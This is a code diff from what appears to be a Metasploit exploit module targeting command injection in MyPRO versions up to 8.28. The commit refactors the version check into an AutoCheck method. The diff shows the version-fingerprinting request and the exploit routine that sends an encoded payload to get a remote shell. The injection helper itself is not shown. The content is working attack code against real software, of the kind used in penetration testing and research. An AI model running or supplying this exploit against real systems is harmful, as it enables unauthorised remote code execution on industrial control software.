|
1 | 1 | class MetasploitModule < Msf::Exploit::Remote |
2 | 2 | Rank = ExcellentRanking |
3 | 3 | include Msf::Exploit::Remote::HttpClient |
4 | | - include Msf::Exploit::CmdStager |
| 4 | + prepend Msf::Exploit::Remote::AutoCheck |
5 | 5 |
|
6 | 6 | def initialize(info = {}) |
7 | 7 | super( |
@@ -60,63 +60,63 @@ def initialize(info = {}) |
60 | 60 | ) |
61 | 61 | end |
62 | 62 |
|
63 | | - def exploit |
64 | | - connect |
65 | | - case target['Type'] |
66 | | - when :win_fetch |
67 | | - execute_command(payload.encoded) |
68 | | - end |
69 | | - end |
70 | | - |
71 | | - def execute_command(cmd, _opts = {}) |
72 | | - print_status('Checking MyPRO version...') |
73 | | - check_version |
74 | | - print_status('Checking credentials...') |
75 | | - check_auth |
76 | | - print_status('Sending command injection...') |
77 | | - exec_mypro(cmd) |
78 | | - print_status('Exploit finished, check thy shell.') |
79 | | - handler |
80 | | - end |
81 | | - |
82 | 63 | # Determine if the MyPRO instance runs a vulnerable version |
83 | | - def check_version |
84 | | - res = send_request_cgi({ |
85 | | - 'method' => 'POST', |
86 | | - 'uri' => normalize_uri(target_uri.path, 'l.fcgi'), |
87 | | - 'vars_post' => { |
88 | | - 't' => '98' |
89 | | - } |
90 | | - }) |
91 | | - |
92 | | - unless res |
93 | | - fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') |
94 | | - |
| 64 | + def check |
| 65 | + begin |
| 66 | + res = send_request_cgi({ |
| 67 | + 'method' => 'POST', |
| 68 | + 'uri' => normalize_uri(target_uri.path, 'l.fcgi'), |
| 69 | + 'vars_post' => { |
| 70 | + 't' => '98' |
| 71 | + } |
| 72 | + }) |
| 73 | + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError |
| 74 | + return CheckCode::Unknown |
| 75 | + ensure |
| 76 | + disconnect |
95 | 77 | end |
| 78 | + |
96 | 79 | if res && res.code == 200 |
97 | 80 | regex = /\{.*\}/m |
98 | 81 | json_body = res.body[regex, 0] |
99 | 82 | data = JSON.parse(json_body) |
100 | 83 | version = data['V'] |
101 | 84 | if version.nil? |
102 | | - fail_with(Failure::Unknown, 'Version missing from server response.') |
| 85 | + return CheckCode::Unknown |
103 | 86 | else |
104 | | - print_good('Version retrieved: ' + version) |
| 87 | + vprint_status('Version retrieved: ' + version) |
105 | 88 | end |
106 | 89 |
|
107 | 90 | parts = version.split('.') |
108 | 91 | major = parts[0] |
109 | 92 | minor = parts[1] |
110 | 93 | if major.to_i == 8 && minor.to_i <= 28 |
111 | | - print_good('Version is vulnerable.') |
| 94 | + return CheckCode::Appears |
112 | 95 | else |
113 | | - fail_with(Failure::NotVulnerable, 'Version is not vulnerable.') |
| 96 | + return CheckCode::Safe |
114 | 97 | end |
115 | 98 | else |
116 | | - fail_with(Failure::Unknown, 'Unexpected server response received.') |
| 99 | + return CheckCode::Unknown |
117 | 100 | end |
118 | 101 | end |
119 | 102 |
|
| 103 | + def exploit |
| 104 | + connect |
| 105 | + case target['Type'] |
| 106 | + when :win_fetch |
| 107 | + execute_command(payload.encoded) |
| 108 | + end |
| 109 | + end |
| 110 | + |
| 111 | + def execute_command(cmd) |
| 112 | + print_status('Checking credentials...') |
| 113 | + check_auth |
| 114 | + print_status('Sending command injection...') |
| 115 | + exec_mypro(cmd) |
| 116 | + print_status('Exploit finished, check thy shell.') |
| 117 | + handler |
| 118 | + end |
| 119 | + |
120 | 120 | # Check if credentials are working |
121 | 121 | def check_auth |
122 | 122 | res = send_request_cgi({ |
|
0 commit comments